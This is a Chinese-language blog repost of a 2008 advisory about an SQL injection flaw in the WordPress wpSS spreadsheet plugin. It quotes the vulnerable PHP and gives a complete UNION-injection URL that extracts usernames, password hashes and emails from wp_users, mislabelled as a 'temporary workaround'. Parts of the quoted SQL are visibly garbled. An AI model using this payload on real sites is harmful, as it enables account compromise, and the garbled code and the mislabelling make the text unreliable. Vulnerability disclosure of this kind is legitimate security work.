WordPress wpSS插件ss_id参数SQL注入漏洞

Posted by ArtHack on May 2nd, 2008 and filed under Notice loopholes. You can follow any responses to this entry through the RSS 2.0. Responses are currently closed, but you can trackback from your own site. - 加入超级QQ群:32843311

受影响系统:
WordPress wpSS <= 0.6 v
不受影响系统:
WordPress wpSS 0.62
描述:
——————————————————————————–
BUGTRAQ ID: 28894

wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。

wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:

ss_load.php
$id = $_GET[′ss_id′];
….
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
….
if ($wpdb->query(”CT * $table_name id=′$id′”) == 0) {
….

这允许远程攻击者通过注入任意SQL代码操控SQL查询,导致执行任意代码。

<*来源:1ten0.0net1

链接:http://secunia.com/advisories/29938/
*>

建议:
——————————————————————————–
临时解决方法:

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0×3a,user_pass,0×3a,user_email),3,4++wp_users–&display=plain

厂商补丁:
———
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://timrohrer.com/blog/?page_id=71

Classic Posts

Most Commented Posts

Our Sponsors

Comments are closed

Our Sponsors

Recent Posts

Recent Comments

Tag Cloud

Premium Wordpress Themes

wp remix
StudioPress
Themeforest
Gabfire Themes
Solostream
Translator
Chinese (Simplified) flagChinese (Traditional) flagItalian flagKorean flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroat flagDanish flagFinnish flagHindi flagPolish flagRumanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag
Log in / Art Hack.All rights reserved.